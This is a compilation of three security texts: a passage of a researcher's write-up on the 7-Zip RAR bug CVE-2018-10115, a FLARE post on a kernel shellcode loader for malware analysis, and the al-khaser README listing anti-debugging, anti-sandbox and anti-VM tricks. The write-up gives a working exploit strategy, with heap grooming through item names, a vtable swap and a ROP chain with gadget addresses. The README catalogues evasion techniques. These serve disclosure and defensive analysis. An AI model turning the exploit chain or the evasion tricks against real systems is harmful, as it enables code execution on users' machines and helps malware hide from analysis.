That seems to be correct, right? Well, the problem is that RAR supports three different encoding methods (excluding version 5), and each item can be encoded with a different method. In particular, for each of these three encoding methods there is a different decoder object. Interestingly, the constructors of these decoder objects leave a large part of their state uninitialized. This is because the state needs to be reinitialized for non-solid items anyway and the implicit assumption is that the caller of the decoder would make sure that the first call on the decoder is with isSolid==false. We can easily violate this assumption with a RAR archive that is constructed as follows [2]:

  • The first item uses encoding method v1.
  • The second item uses encoding method v2 (or v3), and has the solid bit set.

The first item will cause the solidStart flag to be set to false. Then, for the second item, a new Rar2 decoder object is created and (since the solid flag is set) the decoding is run with a large part of the decoder’s state being uninitialized.
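The flaw in this logic can be reproduced with a toy model. In the following sketch, ToyDecoder, ToyItem and ExtractAll are hypothetical, and a boolean stands in for the large decoder state that the real constructors leave uninitialized. The loop keeps one global solidStart flag, just like the handler, while decoders are created per method.

```cpp
#include <cassert>
#include <map>
#include <vector>

// Hypothetical decoder: `initialized` stands in for the real decoder state.
struct ToyDecoder {
    bool initialized = false;
    bool usedUninitialized = false;
    void Decode(bool isSolid) {
        if (!isSolid) initialized = true;                  // non-solid items (re)initialize the state
        else if (!initialized) usedUninitialized = true;   // solid item on a fresh decoder
    }
};

struct ToyItem {
    int method;  // encoding method, selects the decoder object
    bool solid;  // solid bit of the item
};

// Returns true if any decoder was run on uninitialized state.
bool ExtractAll(const std::vector<ToyItem> &items) {
    std::map<int, ToyDecoder> decoders;  // one decoder per method, created on demand
    bool solidStart = true;              // a single flag for all decoders
    bool sawUninitializedUse = false;
    for (const ToyItem &item : items) {
        bool isSolid = item.solid;
        if (solidStart) {
            isSolid = false;
            solidStart = false;
        }
        ToyDecoder &decoder = decoders[item.method];
        decoder.Decode(isSolid);
        sawUninitializedUse = sawUninitializedUse || decoder.usedUninitialized;
    }
    return sawUninitializedUse;
}
```

Two items with the same method are handled correctly. As soon as the second item uses a different method and has the solid bit set, a freshly created decoder is run with isSolid == true.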

At first sight, this may not look too bad. However, various parts of the uninitialized state can be used to cause memory corruptions:

  1. Member variables holding the size of heap-based buffers. These variables may now hold a size that is larger than the actual buffer, allowing a heap-based buffer overflow.
  2. Arrays with indices that are used to index into other arrays, for both reading and writing values.
  3. The PPMd state discussed in my previous post. Recall that the code relies heavily on the soundness of the model’s state, which can now be violated easily.

Obviously, the list is not complete.

The Fix

In essence, the bug is that the decoder classes do not guarantee that their state is correctly initialized before they are used for the first time. Instead, they rely on the caller to configure the decoder with isSolid==false before the first item is decoded. As we have seen, this does not turn out very well.

There are two different approaches to resolve this bug:

  1. Make the constructor of the decoder classes initialize the full state.
  2. Add an additional boolean member solidAllowed (which is initialized to false) to each decoder class. If isSolid==true even though solidAllowed==false, the decoder can abort with a failure (or set isSolid=false).

UnRAR seems to implement the first option. Igor Pavlov, however, chose to go with a variant of the second option for 7-Zip.
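The second option can be sketched as follows. GuardedDecoder is a hypothetical class, and a counter stands in for the decoder state. As an additional design choice of this sketch, the flag is cleared while an item is being decoded, so that a failed item also blocks a solid continuation. I am not claiming that 7-Zip’s patch does exactly this.

```cpp
#include <cassert>

// Hypothetical decoder that tracks whether a solid continuation is allowed.
class GuardedDecoder {
public:
    // Returns false if the item is refused or if decoding fails.
    bool Decode(bool isSolid, bool inputIsValid) {
        if (isSolid && !solidAllowed_) return false;  // no sound state to continue from
        solidAllowed_ = false;                        // state is in flux while decoding
        if (!isSolid) itemsInState_ = 0;              // non-solid items (re)initialize the state
        if (!inputIsValid) return false;              // error: the flag stays false
        ++itemsInState_;
        solidAllowed_ = true;                         // state is sound again
        return true;
    }
    int ItemsInState() const { return itemsInState_; }

private:
    bool solidAllowed_ = false;  // initialized to false, as described in option 2
    int itemsInState_ = 0;
};
```

A fresh GuardedDecoder rejects a solid item outright, and it accepts solid items only after a non-solid item has been decoded successfully.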

In case you want to patch a fork of 7-Zip or you are just interested in the details of the fix, you might want to have a look at this file, which summarizes the changes.

On Exploitation Mitigation

In the previous post on the 7-Zip bugs CVE-2017-17969 and CVE-2018-5996, I mentioned the lack of DEP and ASLR in 7-Zip before version 18.00 (beta). Shortly after the release of that blog post, Igor Pavlov released 7-Zip 18.01 with the /NXCOMPAT flag, delivering on his promise to enable DEP on all platforms. Moreover, all dynamic libraries (7z.dll, 7-zip.dll, 7-zip32.dll) have the /DYNAMICBASE flag and a relocation table. Hence, most of the running code is subject to ASLR.

However, all main executables (7zFM.exe, 7zG.exe, 7z.exe) come without /DYNAMICBASE and have a stripped relocation table. This means that not only are they not subject to ASLR, but you cannot even enforce ASLR with a tool like EMET or its successor, the Windows Defender Exploit Guard.

Obviously, ASLR can only be effective if all modules are properly randomized. I discussed this with Igor and convinced him to ship the main executables of the new 7-Zip 18.05 with /DYNAMICBASE and relocation table. The 64-bit version still runs with the standard non-high entropy ASLR (presumably because the image base is smaller than 4GB), but this is a minor issue that can be addressed in a future release.

On an additional note, I would like to point out that 7-Zip never allocates or maps additional executable memory, making it a great candidate for Arbitrary Code Guard (ACG). In case you are using Windows 10, you can enable it for 7-Zip by adding the main executables 7z.exe, 7zFM.exe, and 7zG.exe in the Windows Defender Security Center (App & browser control -> Exploit Protection -> Program settings). This will essentially enforce a W^X policy and therefore make exploitation for code execution substantially more difficult.

Writing a Code Execution Exploit

Normally, I would not spend much time thinking about actual weaponized exploits. However, it can sometimes be instructive to write an exploit, if only to learn how much it actually takes to succeed in the given case.

The platform we target is a fully updated Windows 10 Redstone 4 (RS4, Build 17134.1) 64-bit, running 7-Zip 18.01 x64.

Picking an Adequate Exploitation Scenario

There are three basic ways to extract an archive using 7-Zip:

  1. Open the archive with the GUI and either extract files separately (using drag and drop), or extract the whole archive using the Extract button.
  2. Right-click the archive and select "7-Zip->Extract Here" or "7-Zip->Extract to subfolder" from the context menu.
  3. Use the command-line version of 7-Zip.

Each of these three methods will invoke a different executable (7zFM.exe, 7zG.exe, 7z.exe). Since we want to exploit the lack of ASLR in these modules, we need to settle on one extraction method.

The second method (extraction via context menu) seems to be the most attractive one, since it is a method that is probably used very often, and at the same time it should give us a quite predictable behavior (unlike the first method, where a user might decide to open the archive but then extract the “wrong” file). Hence, we go with the second method.

Exploitation Strategy

Using the bug from above, we can create a Rar decoder that operates on (mostly) uninitialized state. So let us see for which Rar decoder this may allow us to corrupt the heap in an attacker-controlled manner.

One possibility is to use the Rar1 decoder. The method NCompress::NRar1::CDecoder::HuffDecode contains the following code:

int bytePlace = DecodeNum(...);
// some code omitted
bytePlace &= 0xff;
// more code omitted
for (;;)
{
  curByte = ChSet[bytePlace];
  newBytePlace = NToPl[curByte++ & 0xff]++;
  if ((curByte & 0xff) > 0xa1)
    CorrHuff(ChSet, NToPl);
  else
    break;
}

ChSet[bytePlace] = ChSet[newBytePlace];
ChSet[newBytePlace] = curByte;
return S_OK;

This is very useful, because the uninitialized state of the Rar1 decoder includes the uint32_t arrays ChSet and NToPl. Hence, newBytePlace is an attacker-controlled uint32_t, and so is curByte (with the restriction that the least significant byte cannot be larger than 0xa1). Moreover, bytePlace is determined by the input stream, so it is attacker-controlled as well (but cannot be larger than 0xff).
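The effect of these last statements is easier to see in a small model. The following Python sketch treats memory as a flat list of 32-bit slots and replays the tail of HuffDecode on it. The function name, the flat-memory layout, and the decision to leave out the CorrHuff path are assumptions made purely for illustration.

```python
MASK32 = 0xFFFFFFFF


def huff_decode_tail(mem, ch_set, n_to_pl, byte_place):
    """Model the last steps of HuffDecode on a flat list of uint32 slots.

    mem        -- list of ints modelling memory as 32-bit words
    ch_set     -- index in mem where the ChSet array starts
    n_to_pl    -- index in mem where the NToPl array starts
    byte_place -- value derived from the input stream (0..0xff)
    """
    cur_byte = mem[ch_set + byte_place]
    slot = n_to_pl + (cur_byte & 0xFF)
    new_byte_place = mem[slot]             # NToPl[curByte & 0xff] ...
    mem[slot] = (mem[slot] + 1) & MASK32   # ... which is post-incremented
    cur_byte = (cur_byte + 1) & MASK32     # curByte++
    if (cur_byte & 0xFF) > 0xA1:
        raise NotImplementedError("CorrHuff path is not modelled")
    # The two final assignments: an out-of-bounds read and write
    # whenever new_byte_place lies beyond the end of ChSet.
    mem[ch_set + byte_place] = mem[ch_set + new_byte_place]
    mem[ch_set + new_byte_place] = cur_byte
    return new_byte_place
```

In this model, a controlled value in NToPl selects an arbitrary slot relative to ChSet; its old content is copied into ChSet, and the slot itself receives the incremented curByte.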

So this would give us a pretty good (though not perfect) read-write primitive. Note, however, that we are in a 64-bit address space, so we will not be able to reach the vtable pointer of the Rar1 decoder object with a 32-bit offset (even if multiplied by sizeof(uint32_t)) from ChSet. Therefore, we will target the vtable pointer of an object that is placed after the Rar1 decoder on the heap.

The idea is to use a Rar3 decoder object for this purpose, which we will use at the same time to hold our payload. In particular, we use the RW-primitive from above to swap the pointer _window, which is a member variable of the Rar3 decoder, with the vtable pointer of the very same Rar3 decoder object. _window points to a 4MB-sized buffer which holds data that has been extracted with the decoder (i.e., it is fully attacker-controlled).

Naturally, we will fill the _window buffer with the address of a stack pivot (xchg rax, rsp), followed by a ROP chain to obtain executable memory and execute the shellcode (which we also put into the _window buffer).

Putting a Replacement Object on the Heap

In order to succeed with the outlined strategy, we need to have full control of the decoder’s uninitialized memory. Roughly speaking, we will do this by making an allocation of the size of the Rar1 decoder object, writing the desired data to it, and then freeing it at some point before the actual Rar1 decoder is allocated.

Obviously, we will need to make sure that the Rar1 decoder’s allocation actually reuses the same chunk of memory that we freed before. A straightforward way to achieve this is to activate Low Fragmentation Heap (LFH) on the corresponding allocation size, then spray the LFH with several of those replacement objects. This actually works, but because allocations on the LFH are randomized since Windows 8, this method will never be able to place the Rar1 decoder object at a constant distance from any other object. Therefore, we try to avoid the LFH and place our object on the regular heap. Very roughly, the allocation strategy is as follows:

  1. Create around 18 pending allocations of all (relevant) sizes smaller than the Rar1 decoder object. This will activate LFH for these allocation sizes and prevent such small allocations from destroying our clean heap structure.
  2. Allocate the replacement object and free it, making sure it is surrounded by busy allocations (and hence not merged with other free chunks).
  3. Rar3 decoder is allocated (the replacement object is not reused, because the Rar3 decoder is larger than the Rar1 decoder).
  4. Rar1 decoder is allocated (reusing the replacement object).

Note that it is unavoidable to allocate some decoder before allocating that Rar1 decoder, because only this way the solidStart flag will be set to false and the next decoder will not be initialized correctly (see above).

If everything works as planned, the Rar1 decoder reuses our replacement object, and the Rar3 decoder object is placed with some constant offset after the Rar1 decoder object.

Allocating and Freeing on the Heap

Obviously, the above allocation strategy requires us to be able to make heap allocations in a reasonably controlled manner. Going through the whole code of the RAR handler, I could not find many good ways to make dynamic allocations on the default process heap that have attacker-controlled size and store attacker-controlled content. In fact, it seems that the only way to do such dynamic allocations is via the names of the archive’s items. Let us see how this works.

When an archive is opened, the method NArchive::NRar::CHandler::Open2 reads all items of the archive with the following code (simplified):

CItem item;

for (;;)
{
  // some code omitted
  bool filled;
  archive.GetNextItem(item, getTextPassword, filled, error);
  // some more code omitted
  if (!filled) {
    // some more code omitted
    break;
  }
  if (item.IgnoreItem()) { continue; }
  bool needAdd = true;
  // some more code omitted
}

The class CItem has a member variable Name of type AString, which stores the (ASCII) name of the corresponding item in a heap-allocated buffer.

Unfortunately, the name of an item is set as follows in NArchive::NRar::CInArchive::ReadName:

for (i = 0; i < nameSize && p[i] != 0; i++) {}
item.Name.SetFrom((const char *)p, i);

I say unfortunately, because this means that we cannot write completely arbitrary bytes to the buffer. In particular, it seems that we cannot write null bytes. This is bad, because the replacement object we want to put on the heap requires a few zero bytes. So what can we do? Well, let us look at AString::SetFrom:

void AString::SetFrom(const char *s, unsigned len)
{
  if (len > _limit)
  {
    char *newBuf = new char[len + 1];
    delete []_chars;
    _chars = newBuf;
    _limit = len;
  }
  if (len != 0)
    memcpy(_chars, s, len);
  _chars[len] = 0;
  _len = len;
}

Okay, so this method will always terminate the string with a null byte. Moreover, we see that AString keeps the same underlying buffer, unless it is too small to hold the desired string. This gives rise to the following idea: Assume we want to write the hex-bytes DEAD00BEEF00BAAD00 to some heap-allocated buffer. Then we will just have an archive with items that have the following names (in the listed order):

  1. DEAD55BEEF55BAAD
  2. DEAD55BEEF
  3. DEAD

Basically, we let the method SetFrom write all null bytes we need. Note that we have replaced all null bytes in our data with some arbitrary non-zero byte (0x55 in this example), ensuring that the full string is written to the buffer.
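The trick can be replayed with a small Python model. This is only a sketch: ToyAString mimics nothing but the buffer-reuse behavior of AString::SetFrom shown above, and the helper names_for is a hypothetical name for the routine that derives the item names from the desired byte sequence.

```python
class ToyAString:
    """Models only the buffer-reuse behaviour of AString::SetFrom."""

    def __init__(self):
        self.limit = 0
        self.chars = bytearray(1)

    def set_from(self, s):
        if len(s) > self.limit:
            self.chars = bytearray(len(s) + 1)  # new char[len + 1]
            self.limit = len(s)
        self.chars[:len(s)] = s                 # memcpy(_chars, s, len)
        self.chars[len(s)] = 0                  # terminating null byte


def names_for(target, filler=0x55):
    """Item names (in order) whose SetFrom calls leave `target` in the buffer.

    `target` must end with a null byte, which the terminator provides.
    """
    if not target or target[-1] != 0:
        raise ValueError("target must end with a null byte")
    body = target[:-1]
    full = bytes(filler if b == 0 else b for b in body)
    # One name for the full length, then one name per embedded null byte,
    # going from the last null byte to the first.
    cuts = [len(body)] + [i for i in range(len(body) - 1, -1, -1) if body[i] == 0]
    return [full[:c] for c in cuts]
```

Feeding the names returned by names_for(bytes.fromhex("DEAD00BEEF00BAAD00")) into a single ToyAString, in order, leaves exactly the desired bytes in its buffer, because each shorter name only overwrites a prefix and places one more terminator.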

This works reasonably well, and we can use this to write arbitrary sequences of bytes, with two small limitations. First, we have to end our sequence with a null byte. Second, we cannot have too many null bytes in our byte sequence, because this will cause a quadratic blow-up of the archive size. Luckily, we can easily work with those restrictions in our specific case.

Finally, note that we can make essentially two types of allocations:

  • Allocations with items such that item.IgnoreItem()==true. Those items will not be added to the list _items, and are hence only temporary. These allocations have the property that they will be freed eventually, and they can (using the above technique) be filled with almost arbitrary sequences of bytes. Since these allocations are all made via the same stack-allocated object item and hence use the same AString object, the allocation sizes of this type need to be strictly increasing in their size. We will use this allocation type mainly to put the replacement object on the heap.
  • Allocations with items such that item.IgnoreItem()==false. Those items will be added to the list _items, causing a copy of the corresponding name. This is useful in particular to cause many pending allocations of certain sizes in order to activate LFH. Note that the copied string cannot contain any null bytes, which is fine for our purposes.

Combining the outlined methods carefully, we can construct an archive that implements the heap allocation strategy from the previous section.


We leverage the lack of ASLR on the main executable 7zG.exe to bypass DEP with a ROP chain. 7-Zip never calls VirtualProtect, so we read the addresses of VirtualAlloc, memcpy, and exit from the Import Address Table to write the following ROP chain:

// pivot stack: xchg rax, rsp;
exec_buffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec_buffer, rsp+shellcode_offset, 0x1000);
jmp exec_buffer;

Since we are running on x86_64 (where most instructions have a longer encoding than in x86) and the binary is not very large, for some of the operations we want to execute there are no neat gadgets. This is not really a problem, but it makes the ROP chain somewhat ugly. For example, in order to set the register R9 to PAGE_EXECUTE_READWRITE before calling VirtualAlloc, we use the following chain of gadgets:

0x40691e, #pop rcx; add eax, 0xfc08500; xchg eax, ebp; ret; 
PAGE_EXECUTE_READWRITE, #value that is popped into rcx
0x401f52, #xor eax, eax; ret; (setting ZF=1 for cmove)
0x4193ad, #cmove r9, rcx; imul rax, rdx; xor edx, edx; imul rax, rax, 0xf4240; div r8; xor edx, edx; div r9; ret; 


The following demo video briefly presents the exploit running on a freshly installed and fully updated Windows 10 RS4 (Build 17134.1) 64-bit with 7-Zip 18.01 x64. As mentioned above, the targeted exploitation scenario is extraction via the context menu 7-Zip->Extract Here and 7-Zip->Extract to subfolder.

On Reliability

After some fine-tuning of the auxiliary heap allocation sizes, the exploit seems to work very reliably.

In order to obtain more information on reliability, I wrote a small script that repeatedly calls the binary 7zG.exe the same way it would be called when extracting the crafted archive via the context menu. Moreover, the script checks that calc.exe is actually started and the process 7zG.exe exits with code 0. Running the script on different Windows operating systems (all fully updated), the results are as follows:

  • Windows 10 RS4 (Build 17134.1) 64-bit: the exploit failed 17 out of 100 000 times.
  • Windows 8.1 64-bit: the exploit failed 12 out of 100 000 times.
  • Windows 7 SP1 64-bit: the exploit failed 90 out of 100 000 times.

Note that across all operating systems, the very same crafted archive is used. This works well, presumably because most changes between the Windows 7 and Windows 10 heap implementation affect the Low Fragmentation Heap, whereas the rest has not changed too much. Moreover, the LFH is still triggered for the same number of pending allocations.

Admittedly, it is not really possible to determine the reliability of an exploit empirically. Still, I believe this to be better than “I ran it a few times, and it seems to be reliable”.
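One way to make such counts a bit more tangible is to turn them into an upper bound on the failure probability. The following Python sketch computes the upper end of the Wilson score interval. It rests on the (strong) assumption that the runs are independent and behave identically, which a real target system does not guarantee; the function name and the choice of a 95% level (z = 1.96) are mine.

```python
import math


def wilson_upper_bound(failures, runs, z=1.96):
    """Upper end of the Wilson score interval for the failure probability."""
    p = failures / runs
    denom = 1 + z * z / runs
    centre = p + z * z / (2 * runs)
    margin = z * math.sqrt(p * (1 - p) / runs + z * z / (4 * runs * runs))
    return (centre + margin) / denom


# Failure counts reported above, each out of 100 000 runs.
observed = {
    "Windows 10 RS4 64-bit": 17,
    "Windows 8.1 64-bit": 12,
    "Windows 7 SP1 64-bit": 90,
}

for system, failures in observed.items():
    bound = wilson_upper_bound(failures, 100_000)
    print(f"{system}: failure rate below {bound:.4%} (95% level, under the stated assumptions)")
```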


In my opinion, this bug is a consequence of the design (partially) inherited from UnRAR. If a class depends on its clients to use it correctly in order to prevent usage of uninitialized class members, you are doomed to fail.

We have seen how this (at first glance) innocent-looking bug can be turned into a reliable weaponized code execution exploit. Due to the lack of ASLR on the main executables, the only difficult part of the exploit was to carry out the heap massaging within the restricted context of RAR extraction.

Fortunately, the new 7-Zip 18.05 not only resolves the bug, but also comes with enabled ASLR on all the main executables.

Timeline of Disclosure

  • 2018-03-06 — Discovery
  • 2018-03-06 — Report
  • 2018-04-14 — MITRE assigned CVE-2018-10115
  • 2018-04-30 — 7-Zip 18.05 released, fixing CVE-2018-10115 and enabling ASLR on the executables.

Loading Kernel Shellcode

In the wake of recent hacking tool dumps, the FLARE team saw a spike in malware samples detonating kernel shellcode. Although most samples can be analyzed statically, the FLARE team sometimes debugs these samples to confirm specific functionality. Debugging can be an efficient way to get around packing or obfuscation and quickly identify the structures, system routines, and processes that a kernel shellcode sample is accessing.

This post begins a series centered on kernel software analysis, and introduces a tool that uses a custom Windows kernel driver to load and execute Windows kernel shellcode. I’ll walk through a brief case study of some kernel shellcode, how to load shellcode with FLARE’s kernel shellcode loader, how to build your own copy, and how it works.

As always, only analyze malware in a safe environment such as a VM; never use tools such as a kernel shellcode loader on any system that you rely on to get your work done.

A Tale of Square Pegs and Round Holes

Depending upon how a shellcode sample is encountered, the analyst may not know whether it is meant to target user space or kernel space. A common triage step is to load the sample in a shellcode loader and debug it in user space. With kernel shellcode, this can have unexpected results such as the access violation in Figure 1.

Figure 1: Access violation from shellcode dereferencing null pointer

The kernel environment is a world apart from user mode: various registers take on different meanings and point to totally different structures. For instance, while the gs segment register in 64-bit Windows user mode points to the Thread Information Block (TIB) whose size is only 0x38 bytes, in kernel mode it points to the Processor Control Region (KPCR) which is much larger. In Figure 1 at address 0x2e07d9, the shellcode is attempting to access the IdtBase member of the KPCR, but because it is running in user mode, the value at offset 0x38 from the gs segment is null. This causes the next instruction to attempt to access invalid memory in the NULL page. What the code is trying to do doesn’t make sense in the user mode environment, and it has crashed as a result.

In contrast, kernel mode is a perfect fit. Figure 2 shows WinDbg’s dt command being used to display the _KPCR type defined within ntoskrnl.pdb, highlighting the field at offset 0x38 named IdtBase.

Figure 2: KPCR structure

Given the rest of the code in this sample, accessing the IdtBase field of the KPCR made perfect sense. Determining that this was kernel shellcode allowed me to quickly resolve the rest of my questions, but to confirm my findings, I wrote a kernel shellcode loader. Here’s what it looks like to use this tool to load a small, do-nothing piece of shellcode.

Using FLARE’s Kernel Shellcode Loader

I booted a target system with a kernel debugger and opened an administrative command prompt in the directory where I copied the shellcode loader (kscldr.exe). The shellcode loader expects to receive the name of the file on disk where the shellcode is located as its only argument. Figure 3 shows an example where I’ve used a hex editor to write the opcodes for the NOP (0x90) and RET (0xC3) instructions into a binary file and invoked kscldr.exe to pass that code to the kernel shellcode loader driver. I created my file using the Windows port of xxd that comes with Vim for Windows.

Figure 3: Using kscldr.exe to load kernel shellcode
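If you prefer not to use a hex editor or xxd, the same two-byte test file can be produced with a few lines of Python. This is just a convenience sketch; the function name write_shellcode_file and the file name in the usage note are arbitrary.

```python
NOP = 0x90  # x86 no-operation opcode
RET = 0xC3  # x86 near return opcode


def write_shellcode_file(path, opcodes):
    """Write the given opcode values to a raw binary file and return its path."""
    with open(path, "wb") as f:
        f.write(bytes(opcodes))
    return path
```

Calling write_shellcode_file("nop_ret.bin", [NOP, RET]) creates a file that can then be passed to kscldr.exe as its only argument.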

The shellcode loader prompts with a security warning. After clicking yes, kscldr.exe installs its driver and uses it to execute the shellcode. The system is frozen at this point because the kernel driver has already issued its breakpoint and the kernel debugger is awaiting commands. Figure 4 shows WinDbg hitting the breakpoint and displaying the corresponding source code for kscldr.sys.

Figure 4: Breaking in kscldr.sys

From the breakpoint, I use WinDbg with source-level debugging to step and trace into the shellcode buffer. Figure 5 shows WinDbg’s disassembly of the buffer after doing this.

Figure 5: Tracing into and disassembling the shellcode

The disassembly shows the 0x90 and 0xc3 opcodes from before, demonstrating that the shellcode buffer is indeed being executed. From here, the powerful facilities of WinDbg are available to debug and analyze the code’s behavior.

Building It Yourself

To try out FLARE’s kernel shellcode loader for yourself, you’ll need to download the source code.

To get started building it, download and install the Windows Driver Kit (WDK). I’m using Windows Driver Kit Version 7.1.0, which is command line driven, whereas more modern versions of the WDK integrate with Visual Studio. If you feel comfortable using a newer kit, you’re welcome to do so, but beware, you’ll have to take matters into your own hands regarding build commands and dependencies. Since WDK 7.1.0 is adequate for purposes of this tool, that is the version I will describe in this post.

Once you have downloaded and installed the WDK, browse to the Windows Driver Kits directory in the start menu on your development system and select the appropriate environment. Figure 6 shows the WDK program group on a Windows 7 system. The term “checked build” indicates that debugging checks will be included. I plan to load 64-bit kernel shellcode, and I like having Windows catch my mistakes early, so I’m using the x64 Checked Build Environment.

Figure 6: Windows Driver Kits program group

In the WDK command prompt, change to the directory where you downloaded the FLARE kernel shellcode loader and type ez.cmd. The script will cause prompts to appear asking you to supply and use a password for a test signing certificate. Once the build completes, visit the bin directory and copy kscldr.exe to your debug target. Before you can commence using your custom copy of this tool, you’ll need to follow just a few more steps to prepare the target system to allow it.

Preparing the Debug Target

To debug kernel shellcode, I wrote a Windows software-only driver that loads and runs shellcode at privilege level 0. Normally, Windows only loads drivers that are signed with a special cross-certificate, but Windows allows you to enable testsigning to load drivers signed with a test certificate. We can create this test certificate for free, and it won’t allow the driver to be loaded on production systems, which is ideal.

In addition to enabling testsigning mode, it is necessary to enable kernel debugging to be able to really follow what is happening after the kernel shellcode gains execution. Starting with Windows Vista, we can enable both testsigning and kernel debugging by issuing the following two commands in an administrative command prompt followed by a reboot:

bcdedit.exe /set testsigning on

bcdedit.exe /set debug on

For debugging in a VM, I install VirtualKD, but you can also follow your virtualization vendor’s directions for connecting a serial port to a named pipe or other mechanism that WinDbg understands. Once that is set up and tested, we’re ready to go!

If you try the shellcode loader and get a blue screen indicating stop code 0x3B (SYSTEM_SERVICE_EXCEPTION), then you likely did not successfully connect the kernel debugger beforehand. Remember that the driver issues a software interrupt to give control to the debugger immediately before executing the shellcode; if the debugger is not successfully attached, Windows will blue screen. If this was the case, reboot and try again, this time first confirming that the debugger is in control by clicking Debug -> Break in WinDbg. Once you know you have control, you can issue the g command to let execution continue (you may need to disable driver load notifications to get it to finish the boot process without further intervention: sxd ld).

How It Works

The user-space application (kscldr.exe) copies the driver from a PE-COFF resource to the disk and registers it as a Windows kernel service. The driver implements device write and I/O control routines to allow interaction from the user application. Its driver entry point first registers dispatch routines to handle CreateFile, WriteFile, DeviceIoControl, and CloseHandle. It then creates a device named \Device\kscldr and a symbolic link making the device name accessible from user-space. When the user application opens the device file and invokes WriteFile, the driver calls ExAllocatePoolWithTag specifying a PoolType of NonPagedPool (which is executable), and writes the buffer to the newly allocated memory. After the write operation, the user application can call DeviceIoControl to call into the shellcode. In response, the driver sets the appropriate flags on the device object, issues a breakpoint to pass control to the kernel debugger, and finally calls the shellcode as if it were a function.

While You’re Here

Driver development opens the door to unique instrumentation opportunities. For example, Figure 7 shows a few kernel callback routines described in the WDK help files that can track system-wide process, thread, and DLL activity.

Figure 7: WDK kernel-mode driver architecture reference

Kernel development is a deep subject that entails a great deal of study, but the WDK also comes with dozens upon dozens of sample drivers that illustrate correct Windows kernel programming techniques. This is a treasure trove of Windows internals information, security research topics, and instrumentation possibilities. If you have time, take a look around before you get back to work.


We’ve shared FLARE’s tool for loading privileged shellcode in test environments so that we can dynamically analyze kernel shellcode. We hope this provides a straightforward way to quickly triage kernel shellcode if it ever appears in your environment. Download the source code now.

Anti-VM techniques — Hyper-V/VPC registry key + WMI queries on Win32_BIOS, Win32_ComputerSystem, MSAcpi_ThermalZoneTemperature, more MAC for Xen, Parallels


al-khaser is a PoC «malware» application with good intentions that aims to stress your anti-malware system. It performs a bunch of common malware tricks with the goal of seeing if you stay under the radar.



You can download the latest release here.

Possible uses

  • You are making an anti-debug plugin and you want to check its effectiveness.
  • You want to ensure that your sandbox solution is hidden enough.
  • Or you want to ensure that your malware analysis environment is well hidden.

Please, if you encounter any of the anti-analysis tricks which you have seen in a malware, don’t hesitate to contribute.


Anti-debugging attacks

  • IsDebuggerPresent
  • CheckRemoteDebuggerPresent
  • Process Environment Block (BeingDebugged)
  • Process Environment Block (NtGlobalFlag)
  • ProcessHeap (Flags)
  • ProcessHeap (ForceFlags)
  • NtQueryInformationProcess (ProcessDebugPort)
  • NtQueryInformationProcess (ProcessDebugFlags)
  • NtQueryInformationProcess (ProcessDebugObject)
  • NtSetInformationThread (HideThreadFromDebugger)
  • NtQueryObject (ObjectTypeInformation)
  • NtQueryObject (ObjectAllTypesInformation)
  • CloseHandle (NtClose) Invalid Handle
  • SetHandleInformation (Protected Handle)
  • UnhandledExceptionFilter
  • OutputDebugString (GetLastError())
  • Hardware Breakpoints (SEH / GetThreadContext)
  • Software Breakpoints (INT3 / 0xCC)
  • Memory Breakpoints (PAGE_GUARD)
  • Interrupt 0x2d
  • Interrupt 1
  • Parent Process (Explorer.exe)
  • SeDebugPrivilege (Csrss.exe)
  • NtYieldExecution / SwitchToThread
  • TLS callbacks
  • Process jobs
  • Memory write watching


  • Erase PE header from memory
  • SizeOfImage

Timing Attacks [Anti-Sandbox]

  • RDTSC (with CPUID to force a VM Exit)
  • RDTSC (Locky version with GetProcessHeap & CloseHandle)
  • Sleep -> SleepEx -> NtDelayExecution
  • Sleep (in a loop a small delay)
  • Sleep and check if time was accelerated (GetTickCount)
  • SetTimer (Standard Windows Timers)
  • timeSetEvent (Multimedia Timers)
  • WaitForSingleObject -> WaitForSingleObjectEx -> NtWaitForSingleObject
  • WaitForMultipleObjects -> WaitForMultipleObjectsEx -> NtWaitForMultipleObjects (todo)
  • IcmpSendEcho (CCleaner Malware)
  • CreateWaitableTimer (todo)
  • CreateTimerQueueTimer (todo)
  • Big crypto loops (todo)

Human Interaction / Generic [Anti-Sandbox]

  • Mouse movement
  • Total Physical memory (GlobalMemoryStatusEx)
  • Disk size using DeviceIoControl (IOCTL_DISK_GET_LENGTH_INFO)
  • Disk size using GetDiskFreeSpaceEx (TotalNumberOfBytes)
  • Mouse (Single click / Double click) (todo)
  • DialogBox (todo)
  • Scrolling (todo)
  • Execution after reboot (todo)
  • Count of processors (Win32/Tinba — Win32/Dyre)
  • Sandbox known product IDs (todo)
  • Color of background pixel (todo)
  • Keyboard layout (Win32/Banload) (todo)

Anti-Virtualization / Full-System Emulation

  • Registry key value artifacts
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VBOX)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (QEMU)
    • HARDWARE\Description\System (SystemBiosVersion) (VBOX)
    • HARDWARE\Description\System (SystemBiosVersion) (QEMU)
    • HARDWARE\Description\System (VideoBiosVersion) (VIRTUALBOX)
    • HARDWARE\Description\System (SystemBiosDate) (06/23/99)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • SYSTEM\ControlSet001\Control\SystemInformation (SystemManufacturer) (VMWARE)
    • SYSTEM\ControlSet001\Control\SystemInformation (SystemProductName) (VMWARE)
  • Registry Keys artifacts
    • SOFTWARE\Oracle\VirtualBox Guest Additions (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxGuest (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxMouse (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxService (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxSF (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxVideo (VBOX)
    • SOFTWARE\VMware, Inc.\VMware Tools (VMWARE)
    • SOFTWARE\Wine (WINE)
    • SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters (HYPER-V)
  • File system artifacts
    • «system32\drivers\VBoxMouse.sys»
    • «system32\drivers\VBoxGuest.sys»
